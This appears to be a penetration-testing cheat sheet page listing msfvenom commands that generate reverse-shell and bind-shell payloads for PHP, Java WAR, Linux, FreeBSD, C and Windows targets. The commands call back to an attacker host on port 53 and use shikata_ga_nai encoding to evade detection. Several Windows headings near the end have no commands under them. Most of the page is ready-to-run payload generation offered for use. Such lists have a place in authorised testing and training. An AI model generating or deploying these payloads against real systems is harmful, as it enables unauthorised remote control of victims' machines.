Msfvenom Payloads
Payload creation using msfvenom
PHP Reverse Shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=53 -f raw -o shell.phpJava War Reverse Shell
msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f war -o shell.war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f war -o shell.warLinux Bind Shell
msfvenom -p linux/x86/shell_bind_tcp LPORT=53 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_naiLinux Binary
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f elf -o shell.elf
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elfFreeBSD Reverse Shell
msfvenom -p bsd/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f elf -o shell.elfC Reverse Shell
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -e x86/shikata_ga_nai -f cWindows Non-Staged Reverse Shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -e x86/shikata_ga_nai -f exe -o non_staged.exeWindows Staged (Meterpreter) Reverse Shell
Windows Staged (Meterpreter) PHP Reverse Shell
Windows Python Reverse Shell
Windows ASP Reverse Shell
Windows ASPX Reverse Shell
Windows Javascript Reverse Shell with NOPS
Windows Powershell Reverse Shell
Windows Reverse Shell excluding bad characters
Windows x64 Reverse Shell
Windows x86 Reverse Shell
DLL Hijacking
Windows Reverse Shell embedding into plink
Last updated
Was this helpful?